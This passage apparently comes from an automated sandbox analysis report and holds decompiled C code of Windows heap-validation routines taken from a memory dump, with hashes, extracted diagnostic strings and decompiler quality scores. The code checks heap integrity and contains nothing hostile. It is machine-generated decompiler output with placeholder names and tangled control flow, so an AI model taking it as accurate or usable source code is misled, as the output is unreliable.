                                  													_t94 = _t415 + 8; // -16
                                  													E018BE4A0(_t414, _t405, 1, _t94, _t309, _t380);
                                  													goto L61;
                                  												}
                                  												_t405 = _t307;
                                  											}
                                  											_t309 = _t380;
                                  											goto L60;
                                  										}
                                  									} else {
                                  										_t407 =  *(_t414 + 0x4c);
                                  										while(1) {
                                  											__eflags = _t407;
                                  											if(_t407 == 0) {
                                  												_t312 =  *(_t378 - 8) & 0x0000ffff;
                                  											} else {
                                  												_t315 =  *(_t378 - 8);
                                  												_t407 =  *(_t414 + 0x4c);
                                  												__eflags = _t315 & _t407;
                                  												if((_t315 & _t407) != 0) {
                                  													_t315 = _t315 ^  *(_t414 + 0x50);
                                  													__eflags = _t315;
                                  												}
                                  												_t312 = _t315 & 0x0000ffff;
                                  											}
                                  											__eflags = _v28 - (_t312 & 0x0000ffff);
                                  											if(_v28 <= (_t312 & 0x0000ffff)) {
                                  												goto L51;
                                  											}
                                  											_t378 =  *_t378;
                                  											__eflags = _t414 + 0xc0 - _t378;
                                  											if(_t414 + 0xc0 != _t378) {
                                  												continue;
                                  											}
                                  											goto L51;
                                  										}
                                  										goto L51;
                                  									}
                                  								}
                                  								_t317 = E018BA229(_t414, _t415);
                                  								__eflags = _t317;
                                  								if(_t317 != 0) {
                                  									goto L39;
                                  								}
                                  								E018BA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
                                  								goto L86;
                                  							}
                                  							_t385 =  *_t415 & 0x0000ffff;
                                  							while(1) {
                                  								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
                                  								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
                                  									break;
                                  								}
                                  								_t320 =  *_t402;
                                  								__eflags = _t320;
                                  								if(_t320 == 0) {
                                  									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
                                  									L34:
                                  									_t63 = _t415 + 8; // -16
                                  									E018BBC04(_t414, _t402, 1, _t63, _t322, _t385);
                                  									_t374 = _v24;
                                  									goto L35;
                                  								}
                                  								_t402 = _t320;
                                  							}
                                  							_t322 = _t385;
                                  							goto L34;
                                  						}
                                  					}
                                  					if(_a20 == 0) {
                                  						L18:
                                  						if(( *(_t415 + 2) & 0x00000004) == 0) {
                                  							goto L67;
                                  						}
                                  						if(E019423E3(_t414, _t415) == 0) {
                                  							goto L117;
                                  						}
                                  						goto L67;
                                  					} else {
                                  						if((_t390 & 0x00000002) == 0) {
                                  							_t326 =  *(_t415 + 3) & 0x000000ff;
                                  						} else {
                                  							_t328 = E01891F5B(_t415);
                                  							_t342 = _v20;
                                  							_t326 =  *(_t328 + 2) & 0x0000ffff;
                                  						}
                                  						_t429 = _t326;
                                  						if(_t429 == 0) {
                                  							goto L18;
                                  						}
                                  						if(_t429 >= 0) {
                                  							__eflags = _t326 & 0x00000800;
                                  							if(__eflags != 0) {
                                  								goto L18;
                                  							}
                                  							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
                                  							if(__eflags >= 0) {
                                  								goto L18;
                                  							}
                                  							_t412 = _a20;
                                  							_t327 = _t326 & 0x0000ffff;
                                  							L17:
                                  							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
                                  							goto L18;
                                  						}
                                  						_t327 = _t326 & 0x00007fff;
                                  						if(_t327 >= 0x81) {
                                  							goto L18;
                                  						}
                                  						_t412 = _a24;
                                  						goto L17;
                                  					}
                                  					L86:
                                  				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
                                  				_t189 = _v12;
                                  				goto L88;
                                  			}
                                  0x01954fa4
                                  0x01954fa8
                                  0x01954fc7
                                  0x01954fcc
                                  0x01954faa
                                  0x01954fbf
                                  0x01954fc4
                                  0x01954fd2
                                  0x01954fd5
                                  0x01954fd6
                                  0x01954f34
                                  0x01954f34
                                  0x00000000
                                  0x01954f39
                                  0x01954e0e
                                  0x01954e14
                                  0x01954e1b
                                  0x01954e25
                                  0x01954e2b
                                  0x01954e2b
                                  0x01954e33
                                  0x01954e38
                                  0x01954e8a
                                  0x01954e8a
                                  0x00000000
                                  0x01954e3a
                                  0x01954e3e
                                  0x01954e43
                                  0x01954e47
                                  0x01954e53
                                  0x01954e58
                                  0x01954e5a
                                  0x01954e5c
                                  0x01954e61
                                  0x01954e61
                                  0x01954e5a
                                  0x01954e6e
                                  0x01954f41
                                  0x01954f47
                                  0x01954f4b
                                  0x01954f6a
                                  0x01954f6f
                                  0x01954f4d
                                  0x01954f62
                                  0x01954f67
                                  0x01954f7f
                                  0x01954f80
                                  0x01954f81
                                  0x00000000
                                  0x01954e74
                                  0x01954e78
                                  0x01954e82
                                  0x01954e88
                                  0x01954e88
                                  0x00000000
                                  0x01954e78
                                  0x01954e6e
                                  0x01954e38
                                  0x01954df3
                                  0x01954bfe
                                  0x01954c01
                                  0x01954c04
                                  0x01954c07
                                  0x01954c09
                                  0x01954c0c
                                  0x01954c0e
                                  0x01954c0e
                                  0x01954c11
                                  0x01954c11
                                  0x01954c0c
                                  0x01954c14
                                  0x01954c17
                                  0x01954dae
                                  0x01954db2
                                  0x01954db7
                                  0x01954dba
                                  0x01954dbd
                                  0x01954ef1
                                  0x01954ef7
                                  0x01954efb
                                  0x01954f1a
                                  0x01954f1f
                                  0x01954efd
                                  0x01954f12
                                  0x01954f17
                                  0x01954f2b
                                  0x01954f2b
                                  0x01954f2d
                                  0x01954f2e
                                  0x01954f2f
                                  0x00000000
                                  0x01954f2f
                                  0x00000000
                                  0x01954c1d
                                  0x01954c1d
                                  0x01954c20
                                  0x01954c23
                                  0x01954c26
                                  0x01954c29
                                  0x01954c2c
                                  0x01954c2e
                                  0x01954d91
                                  0x01954d91
                                  0x01954d92
                                  0x01954d97
                                  0x01954d9e
                                  0x00000000
                                  0x01954d9e
                                  0x01954c34
                                  0x01954c37
                                  0x01954c39
                                  0x01954c3c
                                  0x00000000
                                  0x00000000
                                  0x01954c45
                                  0x01954c48
                                  0x01954c4e
                                  0x01954c50
                                  0x01954c78
                                  0x01954c78
                                  0x01954c7b
                                  0x01954c7d
                                  0x01954c80
                                  0x01954c84
                                  0x01954cad
                                  0x01954cad
                                  0x01954cb0
                                  0x01954cb8
                                  0x01954cbb
                                  0x01954cbe
                                  0x01954cc1
                                  0x01954cc7
                                  0x01954cdc
                                  0x01954cc9
                                  0x01954cd2
                                  0x01954cd4
                                  0x01954cd4
                                  0x01954cde
                                  0x01954ce0
                                  0x01954d13
                                  0x01954d13
                                  0x01954d16
                                  0x01954d18
                                  0x01954d29
                                  0x01954d2a
                                  0x01954d2c
                                  0x01954d34
                                  0x01954d1a
                                  0x01954d1a
                                  0x01954d1a
                                  0x01954d1d
                                  0x01954d1f
                                  0x01954d22
                                  0x01954d24
                                  0x01954d24
                                  0x01954d3c
                                  0x01954d3f
                                  0x01954d45
                                  0x01954d47
                                  0x01954d6c
                                  0x01954d6c
                                  0x01954d70
                                  0x01954d7e
                                  0x01954d84
                                  0x01954d84
                                  0x00000000
                                  0x01954d49
                                  0x01954d49
                                  0x01954d56
                                  0x01954d56
                                  0x01954d59
                                  0x00000000
                                  0x00000000
                                  0x01954d4e
                                  0x01954d50
                                  0x01954d52
                                  0x01954d8e
                                  0x01954d5d
                                  0x01954d5f
                                  0x01954d67
                                  0x00000000
                                  0x01954d67
                                  0x01954d54
                                  0x01954d54
                                  0x01954d5b
                                  0x00000000
                                  0x01954d5b
                                  0x01954ce2
                                  0x01954ce2
                                  0x01954ce5
                                  0x01954ce5
                                  0x01954ce7
                                  0x01954cfb
                                  0x01954ce9
                                  0x01954ce9
                                  0x01954cec
                                  0x01954cef
                                  0x01954cf1
                                  0x01954cf3
                                  0x01954cf3
                                  0x01954cf3
                                  0x01954cf6
                                  0x01954cf6
                                  0x01954d02
                                  0x01954d05
                                  0x00000000
                                  0x00000000
                                  0x01954d07
                                  0x01954d0f
                                  0x01954d11
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x01954d11
                                  0x00000000
                                  0x01954ce5
                                  0x01954ce0
                                  0x01954c8a
                                  0x01954c8f
                                  0x01954c91
                                  0x00000000
                                  0x00000000
                                  0x01954c9d
                                  0x00000000
                                  0x01954c9d
                                  0x01954c52
                                  0x01954c5f
                                  0x01954c5f
                                  0x01954c62
                                  0x00000000
                                  0x00000000
                                  0x01954c57
                                  0x01954c59
                                  0x01954c5b
                                  0x01954caa
                                  0x01954c66
                                  0x01954c68
                                  0x01954c70
                                  0x01954c75
                                  0x00000000
                                  0x01954c75
                                  0x01954c5d
                                  0x01954c5d
                                  0x01954c64
                                  0x00000000
                                  0x01954c64
                                  0x01954c17
                                  0x01954b75
                                  0x01954bc4
                                  0x01954bc8
                                  0x00000000
                                  0x00000000
                                  0x01954bd9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x01954b77
                                  0x01954b7a
                                  0x01954b8c
                                  0x01954b7c
                                  0x01954b7e
                                  0x01954b83
                                  0x01954b86
                                  0x01954b86
                                  0x01954b90
                                  0x01954b93
                                  0x00000000
                                  0x00000000
                                  0x01954b95
                                  0x01954bab
                                  0x01954bb0
                                  0x00000000
                                  0x00000000
                                  0x01954bb2
                                  0x01954bb9
                                  0x00000000
                                  0x00000000
                                  0x01954bbb
                                  0x01954bbe
                                  0x01954bc1
                                  0x01954bc1
                                  0x00000000
                                  0x01954bc1
                                  0x01954b97
                                  0x01954ba4
                                  0x00000000
                                  0x00000000
                                  0x01954ba6
                                  0x00000000
                                  0x01954ba6
                                  0x01954ea9
                                  0x01954ea9
                                  0x01954eb2
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                  • API String ID: 0-3591852110
                                  • Opcode ID: abf9ad43c3e1450ca78a26f9b51caba3b7ce5679fbc0ded930d9fc91bd85612a
                                  • Instruction ID: 78e2ecf5d29acc599fe09f6f734427792549d1e7ed50bda911d35d0d56e8f175
                                  • Opcode Fuzzy Hash: abf9ad43c3e1450ca78a26f9b51caba3b7ce5679fbc0ded930d9fc91bd85612a
                                  • Instruction Fuzzy Hash: 4E12E3706006429FEBA5DF2DC484BBABBF5FF44701F148859E88A9B741E774E980CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 56%
                                  			E01954496(signed int* __ecx, void* __edx) {
                                  				signed int _v5;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				signed char _v24;
                                  				signed int* _v28;
                                  				char _v32;
                                  				signed int* _v36;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t150;
                                  				intOrPtr _t151;
                                  				signed char _t156;
                                  				intOrPtr _t157;
                                  				unsigned int _t169;
                                  				intOrPtr _t170;
                                  				signed int* _t183;
                                  				signed char _t184;
                                  				intOrPtr _t191;
                                  				signed int _t201;
                                  				intOrPtr _t203;
                                  				intOrPtr _t212;
                                  				intOrPtr _t220;
                                  				signed int _t230;
                                  				signed int _t241;
                                  				signed int _t244;
                                  				void* _t259;
                                  				signed int _t260;
                                  				signed int* _t261;
                                  				intOrPtr* _t262;
                                  				signed int _t263;
                                  				signed int* _t264;
                                  				signed int _t267;
                                  				signed int* _t268;
                                  				void* _t270;
                                  				void* _t281;
                                  				signed short _t285;
                                  				signed short _t289;
                                  				signed int _t291;
                                  				signed int _t298;
                                  				signed char _t303;
                                  				signed char _t308;
                                  				signed int _t314;
                                  				intOrPtr _t317;
                                  				unsigned int _t319;
                                  				signed int* _t325;
                                  				signed int _t326;
                                  				signed int _t327;
                                  				intOrPtr _t328;
                                  				signed int _t329;
                                  				signed int _t330;
                                  				signed int* _t331;
                                  				signed int _t332;
                                  				signed int _t350;
                                  
                                  				_t259 = __edx;
                                  				_t331 = __ecx;
                                  				_v28 = __ecx;
                                  				_v20 = 0;
                                  				_v12 = 0;
                                  				_t150 = E019549A4(__ecx);
                                  				_t267 = 1;
                                  				if(_t150 == 0) {
                                  					L61:
                                  					_t151 =  *[fs:0x30];
                                  					__eflags =  *((char*)(_t151 + 2));
                                  					if( *((char*)(_t151 + 2)) != 0) {
                                  						 *0x1986378 = _t267;
                                  						asm("int3");
                                  						 *0x1986378 = 0;
                                  					}
                                  					__eflags = _v12;
                                  					if(_v12 != 0) {
                                  						_t105 =  &_v16;
                                  						 *_t105 = _v16 & 0x00000000;
                                  						__eflags =  *_t105;
                                  						E018C174B( &_v12,  &_v16, 0x8000);
                                  					}
                                  					L65:
                                  					__eflags = 0;
                                  					return 0;
                                  				}
                                  				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
                                  					_t268 =  &(_t331[0x30]);
                                  					_v32 = 0;
                                  					_t260 =  *_t268;
                                  					_t308 = 0;
                                  					_v24 = 0;
                                  					while(_t268 != _t260) {
                                  						_t260 =  *_t260;
                                  						_v16 =  *_t325 & 0x0000ffff;
                                  						_t156 = _t325[0];
                                  						_v28 = _t325;
                                  						_v5 = _t156;
                                  						__eflags = _t156 & 0x00000001;
                                  						if((_t156 & 0x00000001) != 0) {
                                  							_t157 =  *[fs:0x30];
                                  							__eflags =  *(_t157 + 0xc);
                                  							if( *(_t157 + 0xc) == 0) {
                                  								_push("HEAP: ");
                                  								E0189B150();
                                  							} else {
                                  								E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  							}
                                  							_push(_t325);
                                  							E0189B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
                                  							L32:
                                  							_t270 = 0;
                                  							__eflags = _t331[0x13];
                                  							if(_t331[0x13] != 0) {
                                  								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
                                  								 *_t325 =  *_t325 ^ _t331[0x14];
                                  							}
                                  							L60:
                                  							_t267 = _t270 + 1;
                                  							__eflags = _t267;
                                  							goto L61;
                                  						}
                                  						_t169 =  *_t325 & 0x0000ffff;
                                  						__eflags = _t169 - _t308;
                                  						if(_t169 < _t308) {
                                  							_t170 =  *[fs:0x30];
                                  							__eflags =  *(_t170 + 0xc);
                                  							if( *(_t170 + 0xc) == 0) {
                                  								_push("HEAP: ");
                                  								E0189B150();
                                  							} else {
                                  								E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  							}
                                  							E0189B150("Non-Dedicated free list element %p is out of order\n", _t325);
                                  							goto L32;
                                  						} else {
                                  							__eflags = _t331[0x13];
                                  							_t308 = _t169;
                                  							_v24 = _t308;
                                  							if(_t331[0x13] != 0) {
                                  								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
                                  								 *_t325 =  *_t325 ^ _t331[0x14];
                                  								__eflags =  *_t325;
                                  							}
                                  							_t26 =  &_v32;
                                  							 *_t26 = _v32 + 1;
                                  							__eflags =  *_t26;
                                  							continue;
                                  						}
                                  					}
                                  					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
                                  					if( *0x1986350 != 0 && _t331[0x2f] != 0) {
                                  						_push(4);
                                  						_push(0x1000);
                                  						_push( &_v16);
                                  						_push(0);
                                  						_push( &_v12);
                                  						_push(0xffffffff);
                                  						if(E018D9660() >= 0) {
                                  							_v20 = _v12 + 0x204;
                                  						}
                                  					}
                                  					_t183 =  &(_t331[0x27]);
                                  					_t281 = 0x81;
                                  					_t326 =  *_t183;
                                  					if(_t183 == _t326) {
                                  						L49:
                                  						_t261 =  &(_t331[0x29]);
                                  						_t184 = 0;
                                  						_t327 =  *_t261;
                                  						_t282 = 0;
                                  						_v24 = 0;
                                  						_v36 = 0;
                                  						__eflags = _t327 - _t261;
                                  						if(_t327 == _t261) {
                                  							L53:
                                  							_t328 = _v32;
                                  							_v28 = _t331;
                                  							__eflags = _t328 - _t184;
                                  							if(_t328 == _t184) {
                                  								__eflags = _t331[0x1d] - _t282;
                                  								if(_t331[0x1d] == _t282) {
                                  									__eflags = _v12;
                                  									if(_v12 == 0) {
                                  										L82:
                                  										_t267 = 1;
                                  										__eflags = 1;
                                  										goto L83;
                                  									}
                                  									_t329 = _t331[0x2f];
                                  									__eflags = _t329;
                                  									if(_t329 == 0) {
                                  										L77:
                                  										_t330 = _t331[0x22];
                                  										__eflags = _t330;
                                  										if(_t330 == 0) {
                                  											L81:
                                  											_t129 =  &_v16;
                                  											 *_t129 = _v16 & 0x00000000;
                                  											__eflags =  *_t129;
                                  											E018C174B( &_v12,  &_v16, 0x8000);
                                  											goto L82;
                                  										}
                                  										_t314 = _t331[0x21] & 0x0000ffff;
                                  										_t285 = 1;
                                  										__eflags = 1 - _t314;
                                  										if(1 >= _t314) {
                                  											goto L81;
                                  										} else {
                                  											goto L79;
                                  										}
                                  										while(1) {
                                  											L79:
                                  											_t330 = _t330 + 0x40;
                                  											_t332 = _t285 & 0x0000ffff;
                                  											_t262 = _v20 + _t332 * 4;
                                  											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
                                  											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
                                  												break;
                                  											}
                                  											_t285 = _t285 + 1;
                                  											__eflags = _t285 - _t314;
                                  											if(_t285 < _t314) {
                                  												continue;
                                  											}
                                  											goto L81;
                                  										}
                                  										_t191 =  *[fs:0x30];
                                  										__eflags =  *(_t191 + 0xc);
                                  										if( *(_t191 + 0xc) == 0) {
                                  											_push("HEAP: ");
                                  											E0189B150();
                                  										} else {
                                  											E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  										}
                                  										_push(_t262);
                                  										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
                                  										_t148 = _t330 + 0x10; // 0x10
                                  										_push( *((intOrPtr*)(_t330 + 8)));
                                  										E0189B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
                                  										L59:
                                  										_t270 = 0;
                                  										__eflags = 0;
                                  										goto L60;
                                  									}
                                  									_t289 = 1;
                                  									__eflags = 1;
                                  									while(1) {
                                  										_t201 = _v12;
                                  										_t329 = _t329 + 0xc;
                                  										_t263 = _t289 & 0x0000ffff;
                                  										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
                                  										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
                                  											break;
                                  										}
                                  										_t289 = _t289 + 1;
                                  										__eflags = _t289 - 0x81;
                                  										if(_t289 < 0x81) {
                                  											continue;
                                  										}
                                  										goto L77;
                                  									}
                                  									_t203 =  *[fs:0x30];
                                  									__eflags =  *(_t203 + 0xc);
                                  									if( *(_t203 + 0xc) == 0) {
                                  										_push("HEAP: ");
                                  										E0189B150();
                                  									} else {
                                  										E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  									}
                                  									_t291 = _v12;
                                  									_push(_t291 + _t263 * 4);
                                  									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
                                  									_push( *((intOrPtr*)(_t329 + 8)));
                                  									E0189B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
                                  									goto L59;
                                  								}
                                  								_t212 =  *[fs:0x30];
                                  								__eflags =  *(_t212 + 0xc);
                                  								if( *(_t212 + 0xc) == 0) {
                                  									_push("HEAP: ");
                                  									E0189B150();
                                  								} else {
                                  									E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  								}
                                  								_push(_t331[0x1d]);
                                  								_push(_v36);
                                  								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
                                  								L58:
                                  								E0189B150();
                                  								goto L59;
                                  							}
                                  							_t220 =  *[fs:0x30];
                                  							__eflags =  *(_t220 + 0xc);
                                  							if( *(_t220 + 0xc) == 0) {
                                  								_push("HEAP: ");
                                  								E0189B150();
                                  							} else {
                                  								E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  							}
                                  							_push(_t328);
                                  							_push(_v24);
                                  							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                                  							goto L58;
                                  						} else {
                                  							goto L50;
                                  						}
                                  						while(1) {
                                  							L50:
                                  							_t92 = _t327 - 0x10; // -24
                                  							_t282 = _t331;
                                  							_t230 = E01954AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
                                  							__eflags = _t230;
                                  							if(_t230 == 0) {
                                  								goto L59;
                                  							}
                                  							_t327 =  *_t327;
                                  							__eflags = _t327 - _t261;
                                  							if(_t327 != _t261) {
                                  								continue;
                                  							}
                                  							_t184 = _v24;
                                  							_t282 = _v36;
                                  							goto L53;
                                  						}
                                  						goto L59;
                                  					} else {
                                  						while(1) {
                                  							_t39 = _t326 + 0x18; // 0x10
                                  							_t264 = _t39;
                                  							if(_t331[0x13] != 0) {
                                  								_t319 = _t331[0x14] ^  *_t264;
                                  								 *_t264 = _t319;
                                  								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
                                  								_t348 = _t319 >> 0x18 - _t303;
                                  								if(_t319 >> 0x18 != _t303) {
                                  									_push(_t303);
                                  									E0194FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
                                  								}
                                  								_t281 = 0x81;
                                  							}
                                  							_t317 = _v20;
                                  							if(_t317 != 0) {
                                  								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
                                  								_t350 = _t241;
                                  								if(_t350 != 0) {
                                  									if(_t350 >= 0) {
                                  										__eflags = _t241 & 0x00000800;
                                  										if(__eflags == 0) {
                                  											__eflags = _t241 - _t331[0x21];
                                  											if(__eflags < 0) {
                                  												_t298 = _t241;
                                  												_t65 = _t317 + _t298 * 4;
                                  												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
                                  												__eflags =  *_t65;
                                  											}
                                  										}
                                  									} else {
                                  										_t244 = _t241 & 0x00007fff;
                                  										if(_t244 < _t281) {
                                  											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
                                  										}
                                  									}
                                  								}
                                  							}
                                  							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E019423E3(_t331, _t264) == 0) {
                                  								break;
                                  							}
                                  							if(_t331[0x13] != 0) {
                                  								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
                                  								 *_t264 =  *_t264 ^ _t331[0x14];
                                  							}
                                  							_t326 =  *_t326;
                                  							if( &(_t331[0x27]) == _t326) {
                                  								goto L49;
                                  							} else {
                                  								_t281 = 0x81;
                                  								continue;
                                  							}
                                  						}
                                  						__eflags = _t331[0x13];
                                  						if(_t331[0x13] != 0) {
                                  							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
                                  							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
                                  						}
                                  						goto L65;
                                  					}
                                  				} else {
                                  					L83:
                                  					return _t267;
                                  				}
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                  • API String ID: 0-1357697941
                                  • Opcode ID: 4270267dfbcbf709164241492e2ea3565b4920929a104dca31f31fd2e116c7a0
                                  • Instruction ID: 6befba98715a5ef4ac2f7e312b2427a66678ba574282be7073fa8d718cb1dcd0
                                  • Opcode Fuzzy Hash: 4270267dfbcbf709164241492e2ea3565b4920929a104dca31f31fd2e116c7a0
                                  • Instruction Fuzzy Hash: AAF15530600646EFDBA1DF69C480FAABBF5FF05704F188429EA4AE7241E774E685CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E018BA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                                  				char _v8;
                                  				signed short _v12;
                                  				signed short _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				signed short _v28;
                                  				signed int _v32;
                                  				signed int _v36;
                                  				signed int _v40;
                                  				signed int _v44;
                                  				signed int _v48;
                                  				unsigned int _v52;
                                  				signed int _v56;
                                  				void* _v60;
                                  				intOrPtr _v64;
                                  				void* _v72;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __ebp;
                                  				unsigned int _t246;
                                  				signed char _t247;
                                  				signed short _t249;
                                  				unsigned int _t256;
                                  				signed int _t262;
                                  				signed int _t265;
                                  				signed int _t266;
                                  				signed int _t267;
                                  				intOrPtr _t270;
                                  				signed int _t280;
                                  				signed int _t286;
                                  				signed int _t289;
                                  				intOrPtr _t290;
                                  				signed int _t291;
                                  				signed int _t317;
                                  				signed short _t320;
                                  				intOrPtr _t327;
                                  				signed int _t339;
                                  				signed int _t344;
                                  				signed int _t347;
                                  				intOrPtr _t348;
                                  				signed int _t350;
                                  				signed int _t352;
                                  				signed int _t353;
                                  				signed int _t356;
                                  				intOrPtr _t357;
                                  				intOrPtr _t366;
                                  				signed int _t367;
                                  				signed int _t370;
                                  				intOrPtr _t371;
                                  				signed int _t372;
                                  				signed int _t394;
                                  				signed short _t402;
                                  				intOrPtr _t404;
                                  				intOrPtr _t415;
                                  				signed int _t430;
                                  				signed int _t433;
                                  				signed int _t437;
                                  				signed int _t445;
                                  				signed short _t446;
                                  				signed short _t449;
                                  				signed short _t452;
                                  				signed int _t455;
                                  				signed int _t460;
                                  				signed short* _t468;
                                  				signed int _t480;
                                  				signed int _t481;
                                  				signed int _t483;
                                  				intOrPtr _t484;
                                  				signed int _t491;
                                  				unsigned int _t506;
                                  				unsigned int _t508;
                                  				signed int _t513;
                                  				signed int _t514;
                                  				signed int _t521;
                                  				signed short* _t533;
                                  				signed int _t541;
                                  				signed int _t543;
                                  				signed int _t546;
                                  				unsigned int _t551;
                                  				signed int _t553;
                                  
                                  				_t450 = __ecx;
                                  				_t553 = __ecx;
                                  				_t539 = __edx;
                                  				_v28 = 0;
                                  				_v40 = 0;
                                  				if(( *(__ecx + 0xcc) ^  *0x1988a68) != 0) {
                                  					_push(_a4);
                                  					_t513 = __edx;
                                  					L11:
                                  					_t246 = E018BA830(_t450, _t513);
                                  					L7:
                                  					return _t246;
                                  				}
                                  				if(_a8 != 0) {
                                  					__eflags =  *(__edx + 2) & 0x00000008;
                                  					if(( *(__edx + 2) & 0x00000008) != 0) {
                                  						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                                  						_t430 = E018BDF24(__edx,  &_v12,  &_v16);
                                  						__eflags = _t430;
                                  						if(_t430 != 0) {
                                  							_t157 = _t553 + 0x234;
                                  							 *_t157 =  *(_t553 + 0x234) - _v16;
                                  							__eflags =  *_t157;
                                  						}
                                  					}
                                  					_t445 = _a4;
                                  					_t514 = _t539;
                                  					_v48 = _t539;
                                  					L14:
                                  					_t247 =  *((intOrPtr*)(_t539 + 6));
                                  					__eflags = _t247;
                                  					if(_t247 == 0) {
                                  						_t541 = _t553;
                                  					} else {
                                  						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                                  						__eflags = _t541;
                                  					}
                                  					_t249 = 7 + _t445 * 8 + _t514;
                                  					_v12 = _t249;
                                  					__eflags =  *_t249 - 3;
                                  					if( *_t249 == 3) {
                                  						_v16 = _t514 + _t445 * 8 + 8;
                                  						E01899373(_t553, _t514 + _t445 * 8 + 8);
                                  						_t452 = _v16;
                                  						_v28 =  *(_t452 + 0x10);
                                  						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                                  						_v36 =  *(_t452 + 0x14);
                                  						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                                  						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
                                  						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                                  						_t256 =  *(_t452 + 0x14);
                                  						__eflags = _t256 - 0x7f000;
                                  						if(_t256 >= 0x7f000) {
                                  							_t142 = _t553 + 0x1ec;
                                  							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                                  							__eflags =  *_t142;
                                  							_t256 =  *(_t452 + 0x14);
                                  						}
                                  						_t513 = _v48;
                                  						_t445 = _t445 + (_t256 >> 3) + 0x20;
